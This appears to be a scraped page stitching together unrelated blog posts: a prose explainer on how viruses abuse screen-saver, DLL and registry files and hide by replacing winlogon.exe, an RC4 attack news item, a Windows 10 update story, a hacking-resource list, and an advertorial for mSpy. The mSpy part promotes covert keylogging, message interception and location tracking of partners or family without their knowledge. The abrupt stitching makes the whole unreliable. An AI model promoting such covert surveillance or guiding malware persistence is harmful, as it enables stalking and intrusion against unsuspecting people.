Naive.. Again, extension hardly matters, everything a .exe virus can do, a .scr one can do equally well. The days of .scr might be gone, but viruses are probably here to stay, Whatever the type, extension, purpose and payload – The core concepts are always the same. So, let’s take a deeper look at the working of .scr viruses. The key to the future lies in the past.

Between the shadows.. In your Registry Editor, compare the open verb’s command default value for EXE and SCR files, respectively. As you will notice, they’re pretty much identical— “%1″ %* for EXEs and “%1″/s for Screen Saver files. Screen savers are, as it turns out, standalone executables. The only difference between these two default verbs is a /S switch for the SCR file type. The intended purpose of the screen saver’s “open” verb is to allow for testing a screen saver, and the screen saver executable interprets the /S switch accordingly. There’s nothing to stop a virus writer from giving their application a .scr extension and then simply ignoring the /S switch passed to it when the user invokes the program. Exploiting the popularity of screen savers was even easier because the caption of the screen saver’s open verb is shown as “Test” in the right-click menu. A user thinks he’s just testing a screen saver, but what he’s actually doing is activating a virus. A particularly clever virus might even display an actual screen saver, preoccupying you with pretty flowers while it destroys files on your hard drive in the background. This caption is stored in the default value for the open key itself. Meaning, just like you can simply find and change your “Recycle Bin”s name to say “Dumpster” or “TrashCan”, you can also change the “Test” option to anything you like. On an unrelated note, you may also change the “Open” option for a word document to maybe “Do Belly Dance” or anything you like. Of course, this only changes the string and not what it does.(Try using the CTRL + F, find function to poke around and feel the power of regedit. Be warned, don’t change anything that you don’t know about. Changing text strings like “My Computer” is harmless, but changing some core functions code may wreck your computer before you can undo it.

Libraries Can Be Dangerous Executable code can live inside resources or component libraries of many different varieties. These may not seem like obvious candidates for viruses, but they can certainly be exploited in that way. These file types include Dynamic Link Libraries (DLL), Control Panel Applets (CPL), various Type Libraries (TLB, OLB, and so on). This code isn’t directly executable with a %1 command verb like .exe, but this doesn’t mean that the code can’t be run. Just about any function exported from a DLL can be invoked using a helper application called RUNDLL32.exe.

A virus could employ two possible attacks. One would be to replace an existing DLL with a compromised version, in which a particular function is replaced by one of the same name but with altered functionality. Then, whenever the system invokes this function, instead of having the desired result, the virus is activated instead. The second approach is simply to write a DLL from scratch and invoke its functions using RUNDLL32.EXE when needed. This isn’t quite as straightforward as invoking the code in an EXE file, but a DLL, OCX, TLB or other library file is more likely to be accepted by an unsuspecting user or to be overlooked by an antivirus program, so it may well be worth the greater effort on the virus author’s part.

Scripts and Macros—Increased Flexibility Brings Increased Risk Script code requires a script engine to interpret and run, but it can still be exploited. Scripts come in several forms, they may be used to perform a repetitive task, modify documents, pretty much everything that a .exe file can do. Microsoft has done a lot to tighten the security of these macros and scripts, but it’s still easy for a macro virus to do a lot of damage. A popular script category is Windows Script Host (WSH) files. These files, usually with .wsf, .js, or .vbs extensions, carry a default file association which causes them to be executed, no questions asked, when users double-click them. As you might imagine, this can be disastrous.

Web applications may also carry dangerous scripts. Client-side scripts, for example are fairly limited in their access to the host system for security reasons, but there’s a little-known file type, the HTML Application (with an HTA extension), which works like a client-side Web application without the same security restrictions. Its purpose is to allow developers to use their Web development skills to build rich applications using the Web browser metaphor. But again, the unsuspecting user can unleash all sorts of chaos by downloading and executing such a file without first examining its contents. All of these scripts and macros can be readily examined before they’re executed, but clearly an average user won’t bother reading some weird code.

Virus Activation Methods The most common way for a virus to be activated is for a user to directly execute, say an e-mail attachment. Virus writers do just about anything to make you open the attachment using this action, but most developers are savvy enough not to just run an unknown executable. Of course, just about all of us have done it at one time or another—particularly now that viruses can access address books and can assemble a credible-looking e-mail message, ostensibly from someone you know and trust. Be that as it may, as users have become more aware, virus creators have gotten more devious, and there is now a host of new methods for activating a virus on a computer that don’t require any code to be explicitly executed (E-mail attachment viruses are a rare sight nowadays, since most email services themselves check emails for malicious files).

Registration Files Files with a REG extension, are system registration files that hold information to be integrated into the system registry. The problem with them is that they carry a default verb of “open”. This means that if any registration file is double-clicked, it immediately dumps its contents directly into the system registry, without any confirmation required (depending on your OS). Since it has access to the registry, it is free to modify anything it pleases. It may delete vital keys required for the system to startup or even modify existing ones to make further file types vulnerable. Also, it may create a new entry for a previously unknown extension. A general antivirus may not recognize and hence ignore a file extension of for example, .bobo. But in the registry there could be an entry to make the file’s default action to “Open” or “Run” – giving it all the powers of a .exe file. This could be potentially devastating. Luckily, most antivirus softwares nowadays are adopting the “sandboxing” technique to run untested files. Basically the antivirus gives the file a test run in a secure and sealed environment (sandbox) and checks if it tries to get out by for example, trying to access something that it’s not supposed to or changing system settings and variables without asking the users explicitly. Inside the sandbox, it is denied anything remotely suspicious and the antivirus raises a big red flag and moves the file to the quarantine section (virus vault) or maybe even delete it straightaway.

Path Vulnerabilities Another hazard is something called the PATH environment variable. Anyone who uses a computer is bound to have used a “shortcut” file at least once. Whether it’s the “Google Chrome” icon on your desktop or maybe “WinZip” in your taskbar these shortcut files are simply links to the actual files stored in the folder in which they were installed. It’s clearly a little tedious to open “My Computer” -> C: Drive -> Program Files -> Mozilla .. To open “Mozilla Firefox” every time. Hence, we have these shortcut files which simply store the “Path” to the actual application. These files don’t exactly use the Path environment variable, but the concept is exactly the same.

The computer has certain files (example: explorer.exe) that it may routinely need to open (example: at startup). So, in the Registry it has simply stored the name of the file it needs to open, and it’s path (in a path variable). Whenever the OS needs to open a particular system file it simply looks it up in the registry, follows the path in the memory and opens it. What does this has to do with viruses? With everything from phones to cars to houses getting smarter every moment, our computer viruses are not behind. It’s just a little too obvious and literally “on the nose” when a user clicks a file and his computer goes berserk. Once infected, our victim, although compromised is now a little wiser for he knows exactly where it went wrong. If the victim downloaded something from a website that caused damage to his system, s/he may report the website to the police. Clearly jail time is not so appealing to anyone, let alone virus programmers.

This brings us back to path vulnerabilities. Get this. The attacker needs to infect a system without making it too obvious. To do so, s/he needs a time gap between the actual infection and the attack, so that it hits the victim out of the blue. We have two ways to do this by exploiting the path variable. Average users don’t really bother to sniff around system files like in the “Windows” folder (you may find this in your C: drive) and this much understandable carelessness can be exploited. The attacker can simply take two systems, one with Windows 7 and the other with XP and search for the location of (example) “winlogon.exe” – A file that is used by the OS to maintain a user session. (You may find this running in the task manager). Now in the virus file, the attacker can simply write up code to create two copies of virus and send one to the path for Windows 7, and the other one to the path for Windows XP. (The path for the “winlogon.exe” file, which s/he searched earlier). After this, the virus can be coded to delete the file “winlogon.exe” and simply rename itself “winlogon.exe”. So, on the next startup when the OS looks up this file, it instead unleashes the virus and we’ve got BOOM. Total stealth, total annihilation and the victim has got no clue of what the hell just happened. The other way to do this is to code the virus to edit the path in the registry from it’s default value to where it (the virus) is stored. It can then rename itself and in this case on the next startup the OS doesn’t even go to the actual file but instead to the virus and starts it up. Equally effective.

The Best Offense is a Strong Defense Understanding how viruses take hold is the first step in knowing how and where to untangle them from your system once it has been compromised. As viruses become more sophisticated, you can expect them to become more aggressive toward your antivirus software. So what can we do about these nefarious little beasties? We’ve come a long way. Even though the end is not in sight, the roads that lie ahead of us are shorter than the ones behind. Cyber Security today, is tighter than ever but that doesn’t mean we are immune to attacks. If you do have the latest antivirus software and keep your OS updated, you probably don’t need to worry about 99% of all the malcious software out there, but the remaining 1% is the reason why cyber security is a $100 billion market today. Successful attacks are rarer today than ten years ago, but they certainly make up for it in sheer intensity. More and more people each day are relying more and more on their computers, not knowing that simply entering their credit card information on a secure website could be sending all those details to a hacker. Attacks and infections are decreasing in number, but rising in desctructiveness. Today, almost nobody bothers to spread around a virus that simply causes reboots or wipes data, since there’s no real gain for the hacker in it. The malicious softwares today are much more targeted. Clearly, obtaining someone’s social security number or bank pin is much more valuable to a hacker than deleting some random person’s movies and pictures.

The only thing we can do is keep our eyes open and turn around at the slightest hint of trouble. Avoid downloading from unconfirmed sources and make sure your antivirus software and OS is updated. Even if your system is compromised you may never actually know it, but the hacker could have identified that you are an easy target. If just once he could get valuable information from your system, it’s very likely that he will keep the system compromised, silently (make it a slave). Further, make sure to never ever store sensitive or financial information on your computer. Keeping it on an offline system or an external hard drive is much safer

How to Crack RC4 Encryption in WPA-TKIP and TLS

Security researchers have developed a more practical and feasible attack technique against the RC4 cryptographic algorithm that is still widely used to encrypt communications on the Internet.

Despite being very old, RC4 (Rivest Cipher 4) is still the most widely used cryptographic cipher implemented in many popular protocols, including: 

SSL (Secure Socket Layer)TLS (Transport Layer Security)WEP (Wired Equivalent Privacy)WPA (Wi-Fi Protected Access)Microsoft’s RDP (Remote Desktop Protocol)BitTorrentand many more

However, weaknesses in the algorithm have been found over the years, indicating that the RC4 needs to be wiped from the Internet. But, yet about 50% of all TLS traffic is currently protected using the RC4 encryption algorithm.

Now, the situation got even worse, when two Belgian security researchers demonstrated a more practical attack against RC4, allowing an attacker to subsequently expose encrypted information in a much shorter amount of time than was previously possible.

Attack on RC4 with 94% Accuracy

An attack on RC4 demonstrated in 2013 required more than 2,000 hours to accomplish. However, a more successful attack was presented this year in March, which focused on password recovery attacks against RC4 in TLS and required about 312 to 776 hours to execute.

Recently, a paper " All Your Biases Belong To Us: Breaking RC4 in WPA-TKIP and TLS," written by Mathy Vanhoef and Frank Piessens of the University of Leuven in Belgium, demonstrates an attack that allowed them to decrypt cookies encrypted with RC4 within 75 hours with a 94 percent accuracy.

"Our work significantly reduces the execution time of performing an attack, and we consider this improvement very worrisome," reads the blog post by the researchers. "Considering there are still biases that are unused, that more efficient algorithms can be implemented, and better traffic generation techniques can be explored, we expect further improvements in the future."


Breaking Wi-Fi Protected Access Temporal Key Integrity Protocol within An Hour

The attack technique could be exploited by attackers to monitor the connection between a target victim and an HTTPS-protected website, or wireless networks protected by the Wi-Fi Protected Access Temporal Key Integrity Protocol(WPA-TKIP).

In the case of HTTPS-website protected with TLS, researchers used a separate HTTP website to inject JavaScript code that makes the target machine to transmit the encrypted authentication cookie repeatedly. They were able to decrypt a secure cookie with 94 percent accuracy using 9x227 ciphertexts.


The attack took about 75 hours, transmitting 4,450 Web requests per second, although, in the case of attacks against real devices, the time required can be brought down to 52 hours.

However, the new attack against WPA-TKIP requires just an hour to execute, allowing an attacker to inject and decrypt arbitrary packets.

More details about the finding will be presented by the researchers at the upcoming USENIX Security Symposium in Washington D.C. For now, the researchers have released awhitepaper with lots of additional details on their attack techniques.



Like It Or Not... You Can't Disable Windows 10 Automatic Updates

Windows 10 is all set to launch on July 29 and will also be available on USB drives for purchase in retail channels.

So, if you are planning to install Windows 10 Home, one thing you must keep in your mind – You wish or not, the software updates for Microsoft’s new operating system will be mandatory.

Microsoft is planning to make a significant change to its software update policy by "removing the option to DISABLE software updates in Windows 10 Home".

This clearly indicates that all users of Windows operating system must agree to allow Microsoft to install software updates automatically.

In Windows 8.1, users get four options for Windows Update's behavior, which include:

Download and Install Windows Updates AutomaticallyDownload Windows Updates automatically but Choose when to Install themCheck for Updates but Choose when to Download and Install themNever check for, Download, or Install Updates

From a Security point of view, the last option, i.e. never to download or install updates, is not at all recommended by either the company or the security experts. However, the option is still there if Windows users really need it.

In Windows 10, the options for Windows Update are cut to only two, which include:

Check, Download, Install, and Reboot automaticallyCheck, Download, Install automatically and then choose to Reboot

Here is the EULA to which you agree to when you accept the terms of the licensing agreement:

Updates. The software periodically checks for system and app updates, and downloads and installs them for you. You may obtain updates only from Microsoft or authorized sources, and Microsoft may need to update your system to provide you with those updates. By accepting this agreement, you agree to receive these types of automatic updates without any additional notice."


If this happens with the launch of Windows 10, it would be a notable change in any version of Windows OS as Microsoft has talked about Windows 10's Windows-as-a-Service approach that will receive continuous updates.

Every software program needs frequent updates, but the ability of Windows users to permanently delay Windows software updates has made it difficult for Microsoft to keep its OS platform secure and up-to-date. And the only motive behind this change is to maintain the security of its users safe.

Hacking Tutorials

Learning to become hacker is not as easy as learning to become a software developer. I realized this when I started looking for learning resources for simple hacking people do. Even to start doing the simplest hack on own, a hacker requires to have in depth knowledge of multiple topics. Some people recommend minimum knowledge of few programming languages like C, Python, HTML with Unix operating system concepts and networking knowledge is required to start learning hacking techniques. 

Though knowing a lot of things is required, it is not really enough for you to be a competent and successful hacker. You must have a passion and positive attitude towards problem solving. The security softwares are constantly evolving and therefore you must keep learning new things with a really fast pace. 

If you are thinking about ethical hacking as a career option, you may need to be prepared for a lot of hard/smart work. I hope these free resources will help you speed up on your learning. If you decide you pursue ethical hacking as a career option, you may also want to read some in depth ethical hacking books

A lot of people (including me before doing research for this article) think that they can become a hacker using some free hacking tools available on web. Its true that some common types of hacking can be easily done with help of tools, however doing it does not really make you a hacker. A true hacker is the one who can find a vulnerability and develop a tool to exploit and/or demonstrate it.

Hacking is not only about knowing "how things work", but its about knowing "why things work that way" and "how can we challenge it". 

Below are some really useful hacking tutorials and resources you may want to explore in your journey of learning to hack

Advertise Here

Hacking For Dummies - Beginners Tutorials

These tutorials are not really simple for anyone who is just starting to learn hacking techniques. However, these should be simple starting point for you. I am sure you have different opinion about complexity of each tutorial however advanced hacker are going to be calling this a job of script kiddie (beginner hacker). Even to acquire the skills of a script kiddie you need to have good understanding of computer fundamentals and programming.

Cybrary - For those looking to learn ethical hacking skills online, Cybrary provides the perfect platform to do so. Cybrary is a free online IT and cyber security training network that provides instruction in the form of self-paced, easy-to-follow videos. Featuring courses on topics such as Penetration Testing and Ethical Hacking, Advanced Penetration Testing, Post Exploitation Hacking and Computer and Hacking Forensics, Cybrary provides instruction from the beginner to the highly-advanced level of hacking. Additionally, Cybrary offers supplemental study material along with their courses free of charge. With their in-depth training videos and study guides, Cybrary ensures that users develop the best hacking skills.Hacking Tutorials for Beginners - By BreakTheSecurity.comHow to learn Ethical hacking - By Astalavista.comPenetration Testing Tutorial - By Guru99.comBacktrack Penetration Testing TutorialIntroduction to Penetration TestingInformation Gathering with NmapSimple How To Articles By Open Web Application SecurityThe Six Dumbest Ideas in Computer SecuritySecure Design Principles10 steps to secure software

Cryptography Related Tutorials

Cryptography is must know topic for any aspiring security professional or a ethical hacker. You must understand how encryption and decryption is done. You must understand why some of the old encryption techniques do not work in modern computing world.

This is a important area and a lot of software programmers and professional do not understand it very well. Learning cryptography involves a lot of good understanding of mathematics, this means you also need to have good fundamentals on discrete mathematics. 

Introduction to Public Key CryptographyCrypto TutorialIntroduction to CryptographyAn Overview of CryptographyCryptography Tutorials - Herong's Tutorial ExamplesThe Crypto Tutorial - Learn How to Keep Secret SecretIntroduction to cryptology, Part 1: Basic Cryptology Concepts

Websites For Security Related Articles And News

These are some websites, that you may find useful to find hacking related resources and articles. A lot of simple tricks and tips are available for experimenting through these sites for improving yourself to become advanced hacker.

In recent years, many people are aspiring to learn how to hack. With growing interest in this area, a lot of different types of hacking practices are evolving. With popularity of social networks many people have inclined towards vulnerability in various social networks like facebook, twitter, and myspace etc. 

Continuous learning about latest security issues, news and vulnerability reports are really important for any hacker or a security professional. Some of the sites that keep publishing informative articles and news are listed here. 

http://www.astalavista.com/http://packetstormsecurity.com/http://www.blackhat.com/http://www.metasploit.com/http://sectools.org/http://www.2600.com/DEF CON - Hacking conferencehttp://www.breakthesecurity.com/http://www.hacking-tutorial.com/http://www.evilzone.org/http://hackaday.com/http://www.hitb.org/http://www.hackthissite.org/http://pentestmag.comhttp://www.securitytube.net/https://www.ssllabs.com/

EBooks And Whitepapers

Some of the research papers by security experts and gurus can provide you a lot of information and inspiration. White papers can be really difficult to read and understand therefore you may need to read them multiple times. Once you understand the topic well, reading will become much faster and you will be able to skim through a lot content in less time.

Handbook of Applied Cryptography - This ebook contains some free chapter from one of the popular cryptography books. The full book is also available on amazon at Cryptography Book.Network Penetration testing GuideHow to hack anything in JavaMcafee on iPhone and iPad SecurityA Good Collection of White papers on security and vulnerabilities - This site contains collection of white papers from different sources and some of these white papers are really worth referring.Engineering Principles for Information Technology SecurityBasic Principles Of Information ProtectionOpen Web Application Security Project- OWASP is one of the most popular sites that contains web application security related information .

Videos & Play Lists

Those who like to watch video tutorials, here are few I liked. However there are many small video available on youtube. Feel free to explore more and share with us if you like something.

Cryptography Course By Dan Boneh Stanford UniversityOpen Security Training- Youtube Playlist of More than 90 hours. I have found this to be the biggest free training available for security related topic.OWASP AppSec USA 2011: Youtube Playlist containing compilation of OWASP conference highlight in 2011.Defcon: How I Met your Girlfriend - Defcon is one of the most popular hacker conference. The presenters in this conference are well know inside the hacking industry.Defcon: What happens when you steal a hackers computerDefcon: Nmap: Scanning the InternetPublic Key Cryptography: Diffie-Hellman Key ExchangeWeb application Pen testingIntro to Scanning Nmap, Hping, Amap, TCPDump, Metasploit

Forums For Hackers And Security Professionals

Just like any other area, forums are really great help for learning from other experts. Hundreds of security experts and ethical/non-ethical hackers are willing to share their knowledge on forums for some reason. Please keep in mind to do enough research before post a question and be polite to people who take time to answer your question. 

Stackoverflow for security professionalshttp://darksat.x47.net/http://forums.securityinfowatch.com/http://forums.cnet.com/spyware-viruses-security-forum/http://www.hackforums.net/forumdisplay.php?fid=47

Vulnerability Databases And Resources

Vulnerability Databases are the first place to start your day as a security professional. Any new vulnerability detection is generally available through the public vulnerability databases. These databases are a big source of information for hackers to be able to understand and exploit/avoid/fix the vulnerability. 

http://www.exploit-db.com/http://1337day.com/http://securityvulns.com/http://www.securityfocus.com/http://www.osvdb.org/http://www.securiteam.com/http://secunia.com/advisories/http://insecure.org/sploits_all.htmlhttp://zerodayinitiative.com/advisories/published/http://nmrc.org/pub/index.htmlhttp://web.nvd.nist.govhttp://www.vupen.com/english/security-advisories/http://www.vupen.com/blog/http://cvedetails.com/http://www.rapid7.com/vulndb/index.jsphttp://oval.mitre.org/

Product Specific Vulnerability Information

Some of the very popular products in the world require a special attention and therefore you may want to look at the specific security websites directly from vendors. I have kept Linux. Microsoft and apache in this list, however it may apply to any product you may be heavily using. 

Red Hat Security and other updates SiteMicrosoft Products Security BulletinApache Foundation Products Security RepositoryUbuntu Software Security CenterLinux Security Repository

Tools And Programs For Hacking / Security

There are dozens of tools available for doing different types of hacking and tests. Tools are really important to become more productive at your work. Some of the very common tools that are used by hackers are listed here. You may have different choice of tools based on your own comfort.

nmapNSSHpingTCPDumpMetasploitWiresharkNetwork StuffNikto

Summary

I have tried to compile some of these resources for my own reference for the journey of learning I am going to start. I am not even at a beginner level of becoming hacker but the knowledge of this field really fascinates me and keeps me motivated for learning more and more. I hope will be able to become successful in this.

A lot of people use their knowledge skills for breaking stuff and stealing. I personally think that doing harm to someone is a weak choice and will not have a good ending. I would recommend not to use your skills for any un-ethical endeavor. A single misuse of your skill may jeopardize your career since most companies do a strict third party background check before they hire a ethical hacker or a security personal. 

There are dozens of companies looking for ethical hackers and security professionals. There are really good number of opportunities in this area and its really niche compensation segment. You will be easily able to get a decent job without even acquiring all the expert level skills to become a pro hacker.

Need to Spy on a Cell Phone? Here’s a Complete Guide to Spy on Calls,SMS, Contacts & More…

Need to Spy on a Cell Phone?
Here’s a Complete Guide to Spy on Calls,SMS, Contacts & More…

With the advancement in the technology, cell phones have just turned themselves into powerful mini-computers. While some people use cell phones to exchange secret messages and maintain illicit relationships, many children also misuse cell phones for storing and watching inappropriate content. Therefore, in order to investigate the truth it becomes inevitable for people to spy on cell phones of their loved ones or children.

What’s the Best Software to Spy on Cell Phone?

To spy on cell phones, there exists hundreds of spy programs on the market where a majority of them are nothing more than a crap. However, there are a few genuine spy programs as well and mSpy is one among them. After testing a handful of popular cell phone spy programs, I conclude mSpy as the clear winner and best among all.

mSpy is one of the best and most popular software out there to spy on cell phones. It offers an effective means to monitor the target cell phone and record activities like phone calls, text messages, GPS location, emails, web activities and much more. All the monitoring/recording process takes place in a complete stealth mode, so that the target user never gets to know that he/she is under surveillance. mSpy has every feature that a true spy software should have. This makes it a complete cell phone spying kit.

 

 

mSpy Features:

Here is a list of mobile spying features that you get with mSpy:

Phone Call Logs – Each incoming and outgoing number on the target cell phone is logged along with duration and time stamp.SMS Logging – Records both incoming and outgoing SMS.Phone Book Access – Gain access to all the contacts that is stored on the target cell phone.Record Web Activity – The program records all web activities including emails, websites visited, Facebook, WhatsApp, YouTube and more.GPS Location Tracking – Track the exact location of the cell phone user at any given time.Cell ID Tracking: – With this option, it is possible to track the cell phone’s location during the absence of GPS.SMS Commands – Remotely send SMS commands to lock/unlock the cell phone usage or delete call history, SMS logs, photos and videos from the target phone at any time.Remote Device Lock or Wipe – You can remotely lock the target cell phone or wipe all its data at anytime you wish.Keylogging – Records keystrokes typed which includes passwords and other sensitive infrmation.Stealth Operation – Operates in a covert mode so that the presence of the spy software remains unnoticed.No Jail-Break Required – Unlike most other spy programs, mSpy can operate successfully without the need to jail-break the cell phones.

If you are a parent, mSpy can offer you an additional help as it supports a handful of control features as well:

Application Blocking – You have the option to block certain applications from being accessed on the target cell phone.Incoming Call Blocking – Block unwanted incoming calls on the target cell phone.Remote Lock – Remotely lock the cell phone or restrict its usage.Remote Delete – Remotely delete unwanted contacts, call logs, SMS and photos from the target cell phone.

How mSpy Works?

After your purchase, you can directly download mSpy onto the target cell phone. Installation process takes only a few minutes (2-3 min approx).

After the installation, each activity on the target cell phone is recorded and uploaded to the mSpy servers. You can login to your mSpy online account from your PC (or any computer in the world) to spy on the logs at any time. The logs contain Text messagesContacts ListCall HistoryGPS Locations and many other information as mentioned above.

Compatible Cell Phones:

mSpy is compatible with most types of cell phones currently available in the market including:

Android PhonesBlackberryWindows MobileiPhoneiPod and Tablets

You can download mSpy from the following link:

Download mSpy – Android, iOS, BlackBerry & Windows Mobile